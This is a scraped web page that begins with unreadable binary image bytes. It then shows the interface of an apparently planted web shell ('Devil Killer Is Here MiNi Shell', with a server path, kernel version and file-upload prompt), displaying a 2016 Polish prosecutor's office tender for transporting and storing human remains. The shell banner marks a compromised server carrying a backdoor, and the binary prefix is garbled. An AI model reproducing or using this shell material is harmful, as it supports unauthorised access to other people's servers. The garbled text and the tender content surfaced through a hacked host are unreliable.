JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160115/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160115/5427-N-2016.html

<p class="kh_header"><b>Nowy Sącz: Usługi w zakresie przewozu i przechowywania zwłok ludzkich dla potrzeb Prokuratur Rejonowych okręgu nowosądeckiego</b><br>
<b>Numer ogłoszenia: 5427 - 2016; data zamieszczenia: 15.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Nowym Sączu , ul. Jagiellońska 56A, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141000, faks 18 4141006.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowy-sacz.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie przewozu i przechowywania zwłok ludzkich dla potrzeb Prokuratur Rejonowych okręgu nowosądeckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usługi przewozu i przechowywania zwłok ludzkich.  Przewóz zwłok będzie wykonywany przez Wykonawcę na podstawie pisemnego zlecenia prokuratora. Dopuszcza się zlecenie w formie faksu, a  w szczególnych przypadkach także telefoniczne - które niezwłocznie potwierdzone zostanie na piśmie. 

1. Przedmiot zamówienia będzie świadczony w układzie zadaniowym:
Zadanie nr 1: przewóz i przechowywanie zwłok w rejonie działania Prokuratury Rejonowej w Nowym Sączu 
Zadanie nr 2: przewóz i przechowywanie zwłok w rejonie działania Prokuratury Rejonowej w Muszynie
Zadanie nr 3: przewóz i przechowywanie zwłok w rejonie działania Prokuratury Rejonowej w Gorlicach
Zadanie nr 4: przewóz i przechowywanie zwłok w rejonie działania Prokuratury Rejonowej w Limanowej,
Zadanie nr 5: przewóz i przechowywanie  zwłok w rejonie działania Prokuratury Rejonowej w Nowym Targu,
Zadanie nr 6: przewóz i przechowywanie zwłok w rejonie działania Prokuratury Rejonowej w Zakopanem

Zakres usługi przewozu zwłok ludzkich obejmuje:
	-	transport zwłok - poza teren miasta - cena za 1 km (dojazd do miejsca zdarzenia będzie pokrywany tylko w obrębie działania poszczególnych Prokuratur Rejonowych)
	-	transport zwłok - teren miasta - ryczałt,
	-	zbieranie zwłok,
	-	załadunek zwłok,
	-	wyładunek zwłok,
	-	 worek,
Cena za transport na terenie miasta dotyczy miast, w których zlokalizowane są poszczególne Prokuratury Rejonowe.

Zamawiający dopuszcza możliwość składania ofert częściowych na wymienione w niniejszej specyfikacji istotnych warunków zamówienia zadania (1,2,3,4,5,6) z których każde stanowi odrębną część przedmiotu zamówienia. 

W szczególnych przypadkach zwłoki mogą być transportowane poza rejon działania Prokuratur Rejonowych, ale może to mieć miejsce tylko na pisemne zlecenie prokuratora (transport do zakładu Medycyny Sądowej). W tej sytuacji obowiązującą stawką jest cena transport zwłok - poza teren miasta - cena za 1 km.    

Faktyczna ilość przewozów w okresie objętym zamówieniem wynikać będzie ze zdarzeń losowych jakie zaistnieją. 

Zakres usługi przechowywania zwłok ludzkich obejmuje:
	-	Wykonawca zobowiązuje się do udostępnienia pomieszczeń w celu przechowywania lub wykonywania sekcji zwłok przewożonych na zlecenie prokuratora.
	-	Pomieszczenie musi znajdować się w lokalizacji poszczególnych Prokuratur Rejonowych za wyjątkiem Prokuratury Rejonowej w Muszynie gdzie dopuszcza się inną lokalizację pomieszczenia tj. do 60 km 
	-	Pomieszczenie spełnia wszelkie wymogi w tym zakresie.
	-	W przypadku zmiany wymogów sanitarnych w zakresie wyposażenia pomieszczeń Wykonawca jest zobowiązany do jego dostosowania. 
	-	Wykonawca gwarantuje Zamawiającemu całodobowy dostęp do pomieszczenia. 


2. Wykonawca może złożyć ofertę na nieograniczoną liczbę wybranych przez siebie zadań - części przedmiotu zamówienia.

2.1) Przedmiot zamówienia w zakresie ZADANIA NR 1 dotyczy: 

Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Nowym Sączu

Rejon działania Prokuratury Rejonowej w Nowym Sączu: miasto Nowy Sącz, Stary Sącz
gminy: Nowy Sącz, Stary Sącz, Łososina Dolna, Gródek nad Dunajcem, Korzenna, Łabowa, Kamionka Wielka, Nawojowa, Podegrodzie, Łącko, Chełmiec.


2.2) Przedmiot zamówienia w zakresie ZADANIA NR 2 dotyczy: 
	
Przewóz i przechowywanie  zwłok ludzkich na terenie działania Prokuratury Rejonowej w Muszynie

Rejon działania Prokuratury Rejonowej w Muszynie: miasto Muszyna, Krynica
gminy: Muszyna, Krynica, Rytro, Piwniczna.

2.3) Przedmiot zamówienia w zakresie ZADANIA NR 3 dotyczy:
 
Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Gorlicach 

Rejon działania Prokuratury Rejonowej w Gorlicach: miasto Gorlice, Grybów
gminy: Gorlice, Grybów, Moszczenica, Łużna, Bobowa, Ropa, Sękowa, Biecz, Uście Gorlickie, Lipinki, 


2.4) Przedmiot zamówienia w zakresie ZADANIA NR 4 dotyczy: 

Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Limanowej 

Rejon działania Prokuratury Rejonowej w Limanowej: miasto Limanowa, Mszana Dolna,
gminy: Limanowa, Mszana Dolna, Jodłownik, Dobra, Tymbark, Słopnice, Niedźwiedź, Kamienica, Łukowica, Laskowa.

2.5)  Przedmiot zamówienia w zakresie ZADANIA NR 5 dotyczy: 

Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Nowym Targu 

Rejon działania Prokuratura Rejonowej w Nowym Targu: miasto Nowy Targ, Rabka, Szczawnica. 
gminy: Nowy Targ, Rabka, Spytkowice, Raba Wyżna, Jabłonka, Lipnica Wielka, Czarny Dunajec, Szaflary, Łapsze Niżne, Ochotnica Dolna, Czorsztyn, Krościenko n. Dunajcem, Szczawnica.

2.6) Przedmiot zamówienia w zakresie ZADANIA NR 6 dotyczy: 
	
Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Zakopanem

Rejon działania Prokuratury Rejonowej w Zakopanem: miasto Zakopane
gminy: Zakopane, Biały Dunajec, Bukowina Tatrzańska, Poronin, Kościelisko,
3. Wymagania umowne: 

1)	Wykonawca zobowiązuje się do dołożenia należytej staranność oraz zachowania etyki zawodowej przy realizacji zobowiązań umowy, a w szczególności do:
	-	odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne zgłoszeń przewozu zwłok,
	-	przewozu zwłok w jak najkrótszym czasie od zgłoszenia do miejsca zgodnie  z wnioskiem prokuratury,
	-	realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu rozkładu oraz miejsca znalezienia, w sposób sprawny z należytą starannością z zachowaniem poszanowania zwłok,
	-	zapewnienie przewozu zwłok transportem drogowym do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
	-	zapewnienie przewozu zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
	-	należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia 
	-	zachowanie tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia
	-	udostępnienia  pomieszczeń, które spełniają wszelkie wymogi w tym zakresie  w celu przechowywania lub wykonania sekcji zwłok na zlecenie prokuratora
	-	wydawania zwłok ludzkich rodzinie zmarłego, uprawionym osobom  lub podmiotom posiadającym stosowne zezwolenia co najmniej w  godzinach urzędowania prokuratury tj.  od 7.30 -15.30 
	-	wystawiania faktur na podstawie pisemnego zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi
2)	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy
3)	Określenie przez Wykonawcę telefonów kontaktowych i numerów fax oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.
4)	 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 
5)	Realizacja usługi do wyczerpania czasu trwania umowy z zastrzeżeniem uprawnień zawartych w przepisach ustawy o zamówieniach publicznych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 98.37.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi potwierdzenie wyposażenia w środek, środki transportu przystosowane do wykonania zamówienia (kserokopia dowodu rejestracyjnego z której wynika, że samochód ma ważne badania techniczne oraz jest przystosowany do przewozu zwłok, a jeżeli na dowodzie rejestracyjnym nie ma takiej adnotacji należy dołączyć atest potwierdzający przeznaczenie samochodu do przewozu zwłok) w ilości niezbędnej do wykonania przedmiotu zamówienia samochody wraz z informacją o podstawie dysponowania tymi pojazdami.
Potwierdzenie posiadania pomieszczenia w celu przechowywania lub wykonania sekcji zwłok na zlecenie prokuratora. Kserokopia tytułu prawnego do posiadania pomieszczenia ( własność, umowa najmu, dzierżawy lub użyczenia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunku wg formuły  spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunku wg formuły  spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - załącznik nr 1, Oświadczenie na treść art. 22 ust 1 - załącznik nr 2</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Parametry techniczne (ilość środków transportu) - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści złożonej oferty, na podstawie której dokonano wyboru Wykonawcy: w stosunku do osób - zmiany osób reprezentujących na skutek zmian organizacyjnych, zmiany danych adresowych - w przypadku zmiany siedziby, w przypadku zmiany urzędowej stawki VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowy-sacz.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Nowym Sączu
ul. Jagiellońska 56 a
33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2016 godzina 10:00, miejsce: Prokuratura Okręgowa w Nowym Sączu
ul. Jagiellońska 56 a
33-300 Nowy Sącz
pok. 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Nowym Sączu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie ZADANIA NR 1 dotyczy: 

Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Nowym Sączu

Rejon działania Prokuratury Rejonowej w Nowym Sączu: miasto Nowy Sącz, Stary Sącz
gminy: Nowy Sącz, Stary Sącz, Łososina Dolna, Gródek nad Dunajcem, Korzenna, Łabowa, Kamionka Wielka, Nawojowa, Podegrodzie, Łącko, Chełmiec..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 98.37.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przewóz i przechowywanie  zwłok ludzkich na terenie działania Prokuratury Rejonowej w Muszynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie ZADANIA NR 2 dotyczy: 
	
Rejon działania Prokuratury Rejonowej w Muszynie: miasto Muszyna, Krynica
gminy: Muszyna, Krynica, Rytro, Piwniczna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 98.37.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Gorlicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie ZADANIA NR 3 dotyczy:
 
Rejon działania Prokuratury Rejonowej w Gorlicach: miasto Gorlice, Grybów
gminy: Gorlice, Grybów, Moszczenica, Łużna, Bobowa, Ropa, Sękowa, Biecz, Uście Gorlickie, Lipinki,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 98.37.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Limanowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie ZADANIA NR 4 dotyczy: 

Rejon działania Prokuratury Rejonowej w Limanowej: miasto Limanowa, Mszana Dolna,
gminy: Limanowa, Mszana Dolna, Jodłownik, Dobra, Tymbark, Słopnice, Niedźwiedź, Kamienica, Łukowica, Laskowa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 98.37.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przewóz i przechowywanie zwłok ludzkich na terenie działania Prokuratury Rejonowej w Nowym Targu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie ZADANIA NR 5 dotyczy: 

Rejon działania Prokuratura Rejonowej w Nowym Targu: miasto Nowy Targ, Rabka, Szczawnica. 
gminy: Nowy Targ, Rabka, Spytkowice, Raba Wyżna, Jabłonka, Lipnica Wielka, Czarny Dunajec, Szaflary, Łapsze Niżne, Ochotnica Dolna, Czorsztyn, Krościenko n. Dunajcem, Szczawnica..</p></li>
